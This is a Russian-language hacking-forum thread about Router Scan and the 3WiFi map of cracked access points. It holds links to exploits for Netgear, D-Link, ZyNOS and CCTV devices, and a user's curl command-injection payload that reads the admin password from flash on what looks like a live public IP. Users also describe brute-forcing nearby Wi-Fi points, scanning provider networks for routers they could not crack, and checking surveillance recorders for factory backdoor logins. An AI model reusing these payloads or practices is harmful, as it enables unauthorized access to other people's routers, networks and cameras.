Новый тренд. Можно смеяться сколько угодно, но скоро видимо ни на одну страничку http без ругани "протекторов" нельзя зайти будет.
Triton_Mgn
24.11.2016, 21:13
Не смеши мои коленки http отворяестся, .
Не смеши мои коленки http отворяестся,
Шутку понял, смешно.
Спс, квн впервые за несколько лет поглядел. Те же "шутки", тот же театрально-заводящий хохот комиссии.
carartem02
25.11.2016, 19:57
И часто Вам провайдер жалобы пишет? Скан выложите?
Первый раз. Сканил, интернет оффнули, думал проблемы у провайдера, но решил их спросить и они сказали то, что у меня очень странные запросы и проблемы у других, ради этого оффнули
Первый раз. Сканил, интернет оффнули, думал проблемы у провайдера, но решил их спросить и они сказали то, что у меня очень странные запросы и проблемы у других, ради этого оффнули
Что за провайдер?
carartem02
25.11.2016, 21:30
Что за провайдер?
Что-то типо домру, его дочь вроде
http://s019.radikal.ru/i620/1611/35/b9c667e0ddba.png
первый раз вижу на роутер скане пин код из девяти цифр
fire-dance
26.11.2016, 02:25
http://s019.radikal.ru/i620/1611/35/b9c667e0ddba.png
первый раз вижу на роутер скане пин код из девяти цифр
Первый раз. Сканил, интернет оффнули, думал проблемы у провайдера, но решил их спросить и они сказали то, что у меня очень странные запросы и проблемы у других, ради этого оффнули
Если это правда, то напоминает политику моего бывшего местного прова(почил с миром, - туда ему и дорога), некий PNZ(MTS, перекупил его в двухтысячные года).
Тот пров ещё не "дозволял" подключать несколько устройств на один договор(блочил статик IP до выяснения). Благо, тогда многие роутеры срали локальным траффиком наружу, и это можно было отследить.
...
- Ну это же дико, прям ещё Александра II верните.
P.S.
Если "серьёзно", - глагольте что хотели выяснить границы диапазона вашего прова, дабы настроить фаервол.
Прошу прощения, это не личное, смеюсь вовсе не над вами а над ситуацией.
Бага в роутерах netgear:
Authentication Bypass
http://seclists.org/fulldisclosure/2015/Oct/29
Если еще не добавлена в RS, может пригодится.
А можно ли добавить условие добавления на сайт: что пароль не может быть 1
Бага в роутерах netgear:
Authentication Bypass
http://seclists.org/fulldisclosure/2015/Oct/29
Если еще не добавлена в RS, может пригодится.
А разве \src\exploits Exploit_NETGEAR_BRS_FirstSetup.pas не он?
binarymaster
28.11.2016, 11:07
Бага в роутерах netgear:
Authentication Bypass
http://seclists.org/fulldisclosure/2015/Oct/29
А разве \src\exploits Exploit_NETGEAR_BRS_FirstSetup.pas не он?
Да, она самая, и добавлена уже давно. Но всё равно спасибо.
А можно ли добавить условие добавления на сайт: что пароль не может быть 1<=5 символов, а то очень много точек где пароль 3 или 4 символа???
Оффтопим, это в тему 3WiFi надо было писать... но в целом думаю можно.
Silverlite
28.11.2016, 18:53
Была какая то программ куда можно было загружать результаты с роутер скана и затем формировать словарик. Не могу вспомнить название. Кто нить знает где скачать?
henri2002
28.11.2016, 21:21
Была какая то программ куда можно было загружать результаты с роутер скана и затем формировать словарик. Не могу вспомнить название. Кто нить знает где скачать?
оно
http://rgho.st/6hB28P2pV
http://rgho.st/725J44BVX
RouterScan_Log
свежий продукт?
Это уже древнее)))
henri2002
29.11.2016, 00:23
Я может, что то пропустил, а какие есть еще прикладные программы? Или это ваший свежий продукт?
нет, старый.
з.ы.
упс не заметил, уже ответили.
carartem02
29.11.2016, 19:33
Если это правда, то напоминает политику моего бывшего местного прова(почил с миром, - туда ему и дорога), некий PNZ(MTS, перекупил его в двухтысячные года).
Тот пров ещё не "дозволял" подключать несколько устройств на один договор(блочил статик IP до выяснения). Благо, тогда многие роутеры срали локальным траффиком наружу, и это можно было отследить.
...
- Ну это же дико, прям ещё Александра II верните.
P.S.
Если "серьёзно", - глагольте что хотели выяснить границы диапазона вашего прова, дабы настроить фаервол.
Прошу прощения, это не личное, смеюсь вовсе не над вами а над ситуацией.
Всё прикрылось удалением вируса
оно
http://rgho.st/6hB28P2pV
RouterScan_Log
не хочет можно через другой обменник у кого есть
binarymaster
29.11.2016, 21:54
не хочет можно через другой обменник у кого есть
wget http://polariton.rghost.ru/download/6hB28P2pV/c0bc78eade8dc8bb6855133d0ed7906fbe3207b1/RouterScan_Log.rar
wget http://polariton.rghost.ru/download/6hB28P2pV/c0bc78eade8dc8bb6855133d0ed7906fbe3207b1/RouterScan_Log.rar
binarymaster спасибо
wget
Я смотрю Вас привлек мир линукса, это радует.
По теме: данное https://www.opennet.ru/opennews/art.shtml?num=45583 описание уязвимости поможет проекту?
localhost
30.11.2016, 15:03
Я смотрю Вас привлек мир линукса, это радует.
По теме: данное https://www.opennet.ru/opennews/art.shtml?num=45583 описание уязвимости поможет проекту?
ага, очень радует =) ждем линукс версию
Silverlite
30.11.2016, 18:30
оно
http://rgho.st/6hB28P2pV
RouterScan_Log
wget http://polariton.rghost.ru/download/6hB28P2pV/c0bc78eade8dc8bb6855133d0ed7906fbe3207b1/RouterScan_Log.rar
Бесконечно благодарен!
binarymaster
01.12.2016, 01:21
несколько Sercomm Beeline Smart Box S1000.
В кодинговом экстазе вместе с @Felis-Sapiens (https://forum.antichat.xyz/members/268504/) и пачкой билайновских боксов, удалось найти новую уязвимость получения пароля администратора, без логина и бекдора.
Но пока сохраняется баг, из-за которого авторизация на роутере срабатывает не всегда, даже с правильным логином.
Держим в курсе последних событий.
Silverlite
01.12.2016, 13:45
RouterScan_Log при импортировании папки с XML листами выдает ошибку Cannot perform LOCATE on a closed dataset - Native error: 10271. Я так понял отсутствует база.
@binarymaster (https://forum.antichat.xyz/members/148032/)
Хе-хе, сегодня в rss прилетело.
В целом, и задумка, и реализация Router Scan by Stas’M выполнены на 5+ и программа уже давно приобрела свою заслуженную популярность.
https://hackware.ru/?p=1766
Премного благодарен!
пароль не подскажешь от архива ?
пароль не подскажешь от архива ?
пароль: название этого форума
Felis-Sapiens
02.12.2016, 18:44
Тут вот несколько билайновских боксов. Sercomm Beeline Smart Box S1000.
...
Не парсятся RS.
Исправили
Исправили
Будет ли файлик с исправлениями?
binarymaster
02.12.2016, 21:06
Будет ли файлик с исправлениями?
Yes.
http://rgho.st/8bnQYKCcx
anklbens
03.12.2016, 18:12
Почему то если добавляю исправления в rs он просто прогоняет диапазон и вообще ни чего не ищет
binarymaster
03.12.2016, 23:32
Почему то если добавляю исправления в rs он просто прогоняет диапазон и вообще ни чего не ищет
Какие именно исправления?
anklbens
04.12.2016, 00:31
http://rgho.st/8bnQYKCcx Вот это
binarymaster
04.12.2016, 02:51
Вот это
> вообще ни чего не ищет
Скриншоты в студию, сравнение старой и новой версии.
anklbens
04.12.2016, 13:41
Все заработало.отключил антималвар скачал заново файлик все норм.
маленький почти офтоп (т.к.роутерскан парсит IP камеры и есть на форуме интересующиеся этими возможностями РС )
" эксплоит, позволяющий взломать 35 моделей камер наблюдения одним GET-запросом "
https://gist.github.com/Wack0/a3435cafa5eb372b190f971190a506b8
статья для информации
https://xakep.ru/2016/11/30/cctv-ex..._medium=digest&utm_campaign=digest_2016-12-04
может кому-то будет интересно. просьба не пинать и не кидаться обвинениями в склонности к вуайеризму.
Telnet вроде возможен и в винде
телнет-то возможен везде. и в винде тоже. но реализация в роутерскане представляет собой определенные сложности.так во всяком случае я понял из постов, где данная тема уже поднималась
localhost
05.12.2016, 15:42
маленький почти офтоп (т.к.роутерскан парсит IP камеры и есть на форуме интересующиеся этими возможностями РС )
" эксплоит, позволяющий взломать 35 моделей камер наблюдения одним GET-запросом "
https://gist.github.com/Wack0/a3435cafa5eb372b190f971190a506b8
статья для информации
https://xakep.ru/2016/11/30/cctv-ex..._medium=digest&utm_campaign=digest_2016-12-04
может кому-то будет интересно. просьба не пинать и не кидаться обвинениями в склонности к вуайеризму.
Еще одна уязвимость GoAhead (правда очень старая) https://xakep.ru/2004/01/22/20995/ позволяет просматривать некоторые защищенные каталоги, файлы
оно
http://rgho.st/6hB28P2pV
RouterScan_Log
Подскажите как ее заставить работать? какого-то файла не хватает. Может кто помочь ?
henri2002
06.12.2016, 02:44
Подскажите как ее заставить работать? какого-то файла не хватает. Может кто помочь ?
http://rgho.st/725J44BVX
binarymaster
06.12.2016, 11:05
скачиваешь архив, распаковываешь в папку с "старым" роутерсканом и соглашаешься на замену двух файлов. есть способ посложнее.
Выше шла речь про Router Scan Log - это не моя программа, к ней нужен немного иной подход.
Выше шла речь про Router Scan Log - это не моя программа, к ней нужен немного иной подход.
извиняюсь - не понял. пост удаляю. не купил слуховой аппарат, вот и недосмотрел. спасибо, что тыкнули носом а то опозорился-бы только
http://rgho.st/725J44BVX
Спасибо!!! )) Ошибку выдавать перестал, но базы все равно не импортирует, скинь образец тхт
henri2002
06.12.2016, 15:15
Спасибо!!! )) Ошибку выдавать перестал, но базы все равно не импортирует, скинь образец тхт
я этой прогой не пользуюсь, так лежит про запас.
Всем привет)) У меня сегодня аренда ВПС закончилась, все в нем хорошо кроме скорости инета (( Теперь думаю на что перейти, может кто поделиться ссылками или просто совет даст, что лучше юзать под Router Scan, можно в личку! Буду очень признателен за любую помощь.
henri2002
08.12.2016, 18:04
что лучше юзать под Router Scan
ганджубас.
что лучше юзать под Router Scan
грибочки лучше весёлые такие есть
Пароль на архив изменился? Тот что в шапке не подходит.
henri2002
09.12.2016, 23:26
Пароль на архив изменился? Тот что в шапке не подходит.
а какой в шапке.
а какой в шапке.
Тут http://stascorp.com/load/1-1-0-56
henri2002
10.12.2016, 01:55
Тут http://stascorp.com/load/1-1-0-56
не ходите туда, у меня пароль от фай-фай стырили.
Имеется информация о том, что веб-страница stascorp.com содержит нежелательные программы. В соответствии с вашими настройками безопасности она была заблокирована.
Страницы с нежелательными программами пытаются установить ПО, стремящееся вас обмануть и произвести неожиданные изменения на вашем компьютере.
не ходите туда, у меня пароль от фай-фай стырили.
Да, да как скажешь.
не ходите туда, у меня пароль от фай-фай стырили.
Деточка, вы вообще соображаете где находитесь?
- Вы видимо мыслите, что вся сеть цензурируется киндер-сюрпризом?
(простите, не смог удержатся от сарказма)
Так что, за пароль никто ничего не знает?
Так что, за пароль никто ничего не знает?
Вы Очень внимательны, и умны, Сэр!
(Смех сквозь слёзы)
Хоспидя, неужели..
Неужели люди настолько отупели...
Просто обленились
Тут ничего не скажешь, не нужно ничего придумывать.
"дайте мне сразу всё, а я ещё и пожурю за недостаток горячей воды в ванне"
Тьфу блин.
пара препинаков в целый квест превратили действо
Так я из тех скоморохов, что бздят и радеют за мысли тех не сдался. За нелентяев поднимаю чарку!
Все ненужное без проблем удаляется
Эхх Алекс, нам ли жить в печали?!
Вы всё думаете о праведности, чести.
Не надо, не стоит. Поверьте старому пердуну.
Самое главное, что бы вас на кладбон(кладбище) было кому нести, а ещё кому плакать при этом.
Жуть.
Ребята, не поймите привратно. Был тут некий человек "Wifiadapter".
Написал весьма прекрасную программку работы с текстовыми строками под окна и .. пропал.
Может кто знает о судьбе его?
C селекцией и удалением дубликатов были проблемы(памяти не хватало), но всё можно было решить с виртуалкой или работой с диском...
Блин, то что он успел накодить прежде чем ушёл в ночь, уже класcно.
Ежели кто с ним знаком, будьте добры сказать что его вызывают.
Вы Очень внимательны, и умны, Сэр!
(Смех сквозь слёзы)
Хоспидя, неужели..
Неужели люди настолько отупели...
Евгений Ваганыч, вы что-то знаете? Так поделитесь с нами, всем интересно.
DSL2650NRU
10.12.2016, 22:08
Евгений Ваганыч, вы что-то знаете? Так поделитесь с нами, всем интересно.
Пароль из шапки верный - только что проверил.
не ходите туда, у меня пароль от фай-фай стырили.
Имеется информация о том, что веб-страница stascorp.com содержит нежелательные программы. В соответствии с вашими настройками безопасности она была заблокирована.
Страницы с нежелательными программами пытаются установить ПО, стремящееся вас обмануть и произвести неожиданные изменения на вашем компьютере.
во-во...я тоже пострадавший. меня так на сайте обманули, что до сих пор не могу с этого форума уйти.уже психологическая зависимость как от курева. спасайтесь уважаемый. вам еще не поздно....
Так что, за пароль никто ничего не знает?
таки шоб нет - так да. таки знают, но скрывают. для себя придержали. ежели всем сразу раскрывать тайны ввода пароля - так на форум никто и не заглянет. а тут глядишь и посещаемость повышается
Девушки порой такие скрытные: "Имя: Екатерина. Фамилия: скрыто. Дата рождения: скрыто. е-mаil: ivаnovа1992мэйл.ру"
@binarymaster (https://forum.antichat.xyz/members/148032/)
Роутеры NetGear подвержены серьезной уязвимости
https://habrahabr.ru/company/eset/blog/317420/
Такого промаха давно не видел.
binarymaster
12.12.2016, 17:30
Роутеры NetGear подвержены серьезной уязвимости
О, надо будет попробовать.
anklbens
12.12.2016, 21:38
Подскажите уважаемые почему рс добавляет в гуд asus но там нет лог пасс
binarymaster
12.12.2016, 22:38
Подскажите уважаемые почему рс добавляет в гуд asus но там нет лог пасс
Посмотрите в настройках, как у вас выставлен фильтр успешных результатов, и поймёте.
anklbens
13.12.2016, 00:46
Посмотрите в настройках, как у вас выставлен фильтр успешных результатов, и поймёте.
Все разобрался спасибо за ответ не внимательно читал ман)))
binarymaster
13.12.2016, 01:27
но почему-то не срабатывает.
Похоже на ограничение длины запроса.
VasiliyP
13.12.2016, 02:04
Хотелось бы так:
curl 'https://73.136.ll2.174:8443/cgi-bin/;grep$IFS"http_passwd"$IFS`pwd`dev`pwd`mtd1' -k
но почему-то не срабатывает.
Вот так вроде то, что надо (grep -m1):
curl 'https://73.136.112.174:8443/cgi-bin/;grep$IFS-m1$IFS"http_passwd"$IFS`pwd`dev`pwd`mtd1' -k
Здравствуйте! А вот такой вопрос.
Есть программа. Это прекрасно, если люди добавляют в базу, и точки находятся на карте.
А как быть с теми точками, пароли к которым люди находят в ветке https://forum.antichat.ru/threads/435763/
Вот если есть название точки,мак, пин( получила, зашла на роутер ( так же получив логин /пароль к роутеру, иногда методом тыка ), и я знаю, где территориально находится эта точка. Я могу её самостоятельно добавить на карту (поставить метку)?
Если уже отвечали на данный вопрос - прошу прощения, если можно - дайте ссыль на ответ)
понятно, что... мало кто это будет делать, но все же. Меня волнует - предусмотрена ли возможность вручную вносить инфу о точке
Я могу её самостоятельно добавить на карту (поставить метку)?
Вы можете к ней подключиться, просканировать Router Scan и загрузить результаты обычным способом.
а если так пробовала, но точка не отображается в программе?
А как мне получить возможность доступа к своей статистике? Или это невозможно?
binarymaster
14.12.2016, 00:50
В соответствии с этим изменил запрос
Теперь надо придумать, как всё это (особенно \r\n в запросе) запихнуть в эксплойт Router Scan - всё бы ничего, если не дополнительный SSL слой (https/8443).
binarymaster
14.12.2016, 01:39
а если так пробовала, но точка не отображается в программе?
Попросить нас добавить роутер в поддержку, перед этим соблюдая все процедуры оформления заявки (учитывая, что роутер скорее всего доступен лишь вам, а извне нет).
А как мне получить возможность доступа к своей статистике? Или это невозможно?
Это выходит за рамки данной темы, пишите в 3WiFi.
Взлом роутера D-Link DWR-932B
https://cryptoworld.su/vzlom-routera-d-link/
тут нашлось такое дело
" TP-Link и Zyxel имеется уязвимость. Через этот баг можно удаленно вытащить файл с пассами.
скрипт для тестирования роутеров
https://github.com/MrNasro/zynos-attacker/
с его помощью можно тестировать свой и чужой роутер
Тестируем на баг
1) Открываем http://rom-0.cz/index/ и чекаем свой модем
2) Чтобы чекать в ручном режиме вконец айпи добавляем /rom-0 пример 192.168.1.1/rom-0
3) Скачанный файл декодируем тут http://www.routerpwn.com/zynos/ "
кто-то пробовал это дело и можно ли эти уязвимости привязать к РС ?
Felis-Sapiens
16.12.2016, 15:44
кто-то пробовал это дело и можно ли эти уязвимости привязать к РС ?
Так уж есть давно. См. \src\exploits\Exploit_Rom0.pas
Так уж есть давно. См. \src\exploits\Exploit_Rom0.pas
спасибо. видно проскочил
как-то тут ранее на форуме возникала тема. может кому нужен charles (ну не нашим гуру у них давно уже все есть и работает ) наткнулся на версию 3.11.2 с кр. на рутор орг. вроде работает
http://rutracker.org/forum/viewtopic.php?t=2114687
понятно, что... мало кто это будет делать, но все же. Меня волнует - предусмотрена ли возможность вручную вносить инфу о точке
Э-э-э. Можно открыть в текстовом редакторе любой csv сформированный RS и добавить свои данные
henri2002
18.12.2016, 23:29
RS и в текстовом формате, замечательно сохраняет.
RS и в текстовом формате, замечательно сохраняет.
А 3wifi его потом примет?
binarymaster
20.12.2016, 22:58
А 3wifi его потом примет?
3WiFi в общем-то заточен больше под TXT, чем под CSV.
А мне вот внешних модулей в RS не хватает. К примеру пишем консольное приложение на любом языке под какую то конкретную уязвимость. На входе в ParamStr(1) ip, в случае удачи на выходе csv в папке обмена, а rs раз в минуту проверяет эту папку на наличие новых файлов и подхватывает из неё данные. А запуск... Ну можно фильтры как-нибудь для этого дела прикрутить.
Получаем расширяемость и уходим от жесткой привязки к http
binarymaster
20.12.2016, 23:55
К примеру пишем консольное приложение на любом языке под какую то конкретную уязвимость.
Получаем расширяемость и уходим от жесткой привязки к http
И в придачу 100% нагрузку процессора, даже многоядерного, на "густых" диапазонах. Это касается создания множества копий доп. процессов.
Не считывает пароли. Всё есть, а паролей фиг.
Пофиксил.
Да, пожалуй вы правы, но можно запускать внешние процессы в общих рамках. Возникает некоторый гемор с отслеживанием их завершения, но это вполне всё решаемо. Впрочем вам виднее
P.S. А ссылку на фикс?
binarymaster
21.12.2016, 02:40
P.S. А ссылку на фикс?
Будет, но чуть позже.
Ребята, такой вопрос - есть вскрытая подбором пароля точка Beeline_2G_F3F147, ip 2.94.113.34 (смотрел в админке, и через 2ip.ru), при попытке сканирования этого ip РоутерСканом точка не находится, так же 2ip.ru выдаёт город, который не соответствует расположению точки (говорит Москва) - куда копать? Нужно для поиска подобной точки этого-же провайдера. Так же не нашлось ни одной точки с подобным SSID (Beeline_2G_XXXXXX) при сканировании выборки адресов ip моего города (хотя реально таких точек много).
Ребята, такой вопрос - есть вскрытая подбором пароля точка Beeline_2G_F3F147, ip 2.94.113.34 (смотрел в админке, и через 2ip.ru), при попытке сканирования этого ip РоутерСканом точка не находится, так же 2ip.ru выдаёт город, который не соответствует расположению точки (говорит Москва) - куда копать? Нужно для поиска подобной точки этого-же провайдера. Так же не нашлось ни одной точки с подобным SSID (Beeline_2G_XXXXXX) при сканировании выборки адресов ip моего города (хотя реально таких точек много).
Так может роутеры за NAT и не имеют белых(прямых) айпи для выхода во внешнюю сеть.Сканируйте локальную сеть.
Так может роутеры за NAT и не имеют белых(прямых) айпи для выхода во внешнюю сеть.Сканируйте локальную сеть.
Спасибо, в общем к этому и склонялся - как раз почитал всякого про белое-серое - просто уточнил, в ту ли сторону копаю. Прошу пардону, если в недалёком будущем побеспокою по-этому поводу, если не выйдет - только разбираюсь..
Интересуют самые популярные в Польше роутеры . Нельзя ли как-то это выяснить ?
binarymaster
22.12.2016, 00:12
Интересуют самые популярные в Польше роутеры . Нельзя ли как-то это выяснить ?
Ну, если брать базу 3WiFi в качестве источника, выборка будет не совсем корректной. Поскольку это будут самые популярные вскрытые роутеры в Польше. Остальной части, которая пока не поддерживается RS'ом, в выборке не будет.
Вскрытые и нужны . Просто на 3wifi есть поиск по карте , по широте/долготе . Есть просто общая статистика по роутерам . А как выбрать именно Польшу я не понимаю .
Вскрытые и нужны . Просто на 3wifi есть поиск по карте , по широте/долготе . Есть просто общая статистика по роутерам . А как выбрать именно Польшу я не понимаю .
https://www.google.ru/maps/@53.3308727,20.5664067,5z
Курсор на нужное место, щелчек, - координаты снизу карты.
Координаты вставляем в роутерскан - получаем нужный диапазон адресов - сканируем.
binarymaster
22.12.2016, 01:53
Координаты вставляем в роутерскан
Эээ... нету в RS такой функции пока, есть в 3WiFi поиск диапазонов.
Эээ... нету в RS такой функции пока, есть в 3WiFi поиск диапазонов.
Ошибся.... Извиняюсь.
Имел ввиду 3WiFi.
Подскажите, возможна ли такая ситуация - из админки вскрытого роутера (подключился к нему по wifi) - DHCP интерфейс: IP адрес 10.174.193.202 IP шлюз 10.174.192.1 - т.е. локальная сеть провайдера - оба ip пингуются, но 10.174.193.202 не видит РоутерСкан? Защита какая-то, или 10.174.193.202 тоже промежуточное звено, и реальный ip в сети не отображается в андминке?
Подскажите, возможна ли такая ситуация - из админки вскрытого роутера (подключился к нему по wifi) - DHCP интерфейс: IP адрес 10.174.193.202 IP шлюз 10.174.192.1 - т.е. локальная сеть провайдера - оба ip пингуются, но 10.174.193.202 не видит РоутерСкан? Защита какая-то, или 10.174.193.202 тоже промежуточное звено, и реальный ip в сети не отображается в андминке?
У вас один и тот же провайдер? Если один и тот же, то возможно закрыт порт.
У вас один и тот же провайдер? Если один и тот же, то возможно закрыт порт.
Да, провайдер один, но с оговоркой, что провайдер один у роутера, с коротого пингую (к нему подключился по wifi) и цели (уже вскрытой брутом). Т.е. сеть одна, адрес пингуется, но РоутерСкан его не видит. А можно подробнее про порт - с этим можно что-нибудь сделать? Это всё нужно для того, чтобы понять, есть ли смысл сканировать всю локалку РоутерСканом для поиска необходимых (не вскрываемых брутом) роутеров, или бесполезно..
binarymaster
23.12.2016, 17:43
Защита какая-то, или 10.174.193.202 тоже промежуточное звено, и реальный ip в сети не отображается в андминке?
Нет, просто админка не принимает соединения на WAN интерфейс, в том числе изнутри себя.
Нет, просто админка не принимает соединения на WAN интерфейс, в том числе изнутри себя.
А можно для начинающих попроще, никак не переварю.. Собственно суть вопроса - возможна ли ситуация, когда роутер в локалке провайдера вообще не виден РоутерСканом (при том, что пингуется), и если возможна - что с этим можно поделать. Хочется понять, есть ли смысл сканировать всю локалку РоутерСканом для поиска необходимых (не вскрываемых брутом) роутеров, или бесполезно?
зы на вс. случай - выше уточнил - пингую и сканю с другого роутера этого-же провайдера (т.е. оба уже вскрыты брутом, второй - для экспериментов, как цель).
зы2 ещё вопрос - у одного провайдера может быть больше одной локальной сети?
binarymaster
23.12.2016, 18:09
роутер в локалке провайдера вообще не виден РоутерСканом (при том, что пингуется), и если возможна - что с этим можно поделать?
Возможна. Копаться в настройках роутера, чтобы разрешить удалённое управление.
пингую и сканю с другого роутера этого-же провайдера
Тут ещё добавляется некоторая вероятность, что провайдер фильтрует соединения на порты.
у одного провайдера может быть больше одной локальной сети?
Конечно же может.
Возможна. Копаться в настройках роутера, чтобы разрешить удалённое управление.
Тут ещё добавляется некоторая вероятность, что провайдер фильтрует соединения на порты.
Конечно же может.
Спасибо, небольшое уточнение - больше одной локальной сети в одном городе - это нормальная практика? В смысле сейчас сканирую со старого роутера Билайн (не СмартБокс), но вторая вскрытая точка - новый СмартБокс SSID вида Beeline_2G_XXXXXX - хочу найти аналогичную точку (Beeline_2G_XXXXXX), которую не смог сбрутить. Видимо имеет смысл сканировать со СмартБокса, т.к. есть вероятность, что они со старой точкой Билайн в разных локалках?
binarymaster
23.12.2016, 18:24
больше одной локальной сети в одном городе - это нормальная практика?
Как правило, между локальными сетями одного провайдера настроен обмен трафиком, то есть роутинг. А это значит, что никто кроме провайдера не сможет точно сказать, выходит ли локальная сеть за пределы города или нет. Косвенно можно узнать по обнаруженным устройствам и их координатам через геолокацию.
есть вероятность, что они со старой точкой Билайн в разных локалках?
Всё узнаётся на практике, вероятность взять неоткуда.
Видимо имеет смысл сканировать со СмартБокса
Пробуйте все варианты.
localhost
24.12.2016, 13:38
Вы сначало потрудитесь узучить мат часть, как устроены сеть что бы не задавать подобных вопросов. если хост пингуется но не определяется значит порты фильтруются - фаерволом, антивирусом либо закрыты для доступа из интернета
Также внутри локалки, провайдер тупо может запретить все возможные сканеры
Спасибо, согласен матчасть хромает, но учитывая, что нет острой необходимости перелопачивать литературу ради хобби - просто спросил. Т.е. спасибо за ответы .
Спасибо, согласен матчасть хромает, но учитывая, что нет острой необходимости перелопачивать литературу ради хобби - просто спросил. Т.е. спасибо за ответы .
Коли такое отношение к хобби, то Вам определённо стоит поискать себя в чём-то другом.
Коли такое отношение к хобби, то Вам определённо стоит поискать себя в чём-то другом.
Началось - а можт я уже давно нашёл себя в чём-то другом? Самый простой способ получить информацию - спросить у тех, кто в этом разбирается, а не вычленять её из горы литературы, иначе зачем тогда вообще нужен форум? Я спросил - люди ответили, не вижу глобальной проблемы. Разобраться конечно нужно в теме по-человечески, но всегда встаёт вопрос времени - сейчас его нет, когда появится - непременно разберусь.
Подскажите, пожалуйста такое:
в этой программе оч. много функций по подбору на РОУТЕРЫ..
Во время сканирования, она иной раз находит и видеорегистраторы.
Я в этом направлении (видеорегистраторы и IP-камеры) работаю довольно давно,
приходилось бесчисленное число раз восстанавливать утраченные пользователями пароли,
а иногда и ЛОГИНЫ (!!!)
Практически все эти устройства имеют так-сказать BACKDOOR от производителя.
(логины-пароли к бекдурам есть в свободном доступе)
Административные логины и пароли установщики (по моей статистике) меняют в 15-20% установок,
остальное - на стандартных настройках пашет годами (в т.ч и в довольно СУРЪЕЗНЫХ организациях)
Можно ли как-то сильно-сильно "пожелать" функцию, хотябы проверки на стандартные наборы в Вашей программе?
Не говорю уж о смене-добавлении нового пользователя.. )
binarymaster
25.12.2016, 19:45
Можно ли как-то сильно-сильно "пожелать" функцию, хотябы проверки на стандартные наборы в Вашей программе?
Абстрактные пожелания не принимаются.
В идеальном варианте заявка на добавление устройства оформляется следующим образом:
1. Есть устройство, вот его IP-адрес X.X.X.X и доступ по порту XXXX
2. Вот проверенные данные входа superuser:superpass
3. Устройство доступно извне, работает по протоколу HTTP/S, и его можно исследовать
Данный набор устройств не в приоритете, поэтому заявка вряд ли будет быстро исполнена. Тем не менее, правила для всех едины.
Абстрактные пожелания не принимаются.
В идеальном варианте заявка на добавление устройства оформляется следующим образом:
1. Есть устройство, вот его IP-адрес X.X.X.X и доступ по порту XXXX
2. Вот проверенные данные входа superuser:superpass
3. Устройство доступно извне, работает по протоколу HTTP/S, и его можно исследовать
Данный набор устройств не в приоритете, поэтому заявка вряд ли будет быстро исполнена. Тем не менее, правила для всех едины.
А можно такое отправлять в личку? )
carartem02
26.12.2016, 00:15
А можно такое отправлять в личку? )
Я ему давно писал и вроде всё ок было. Скорее всего, да
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot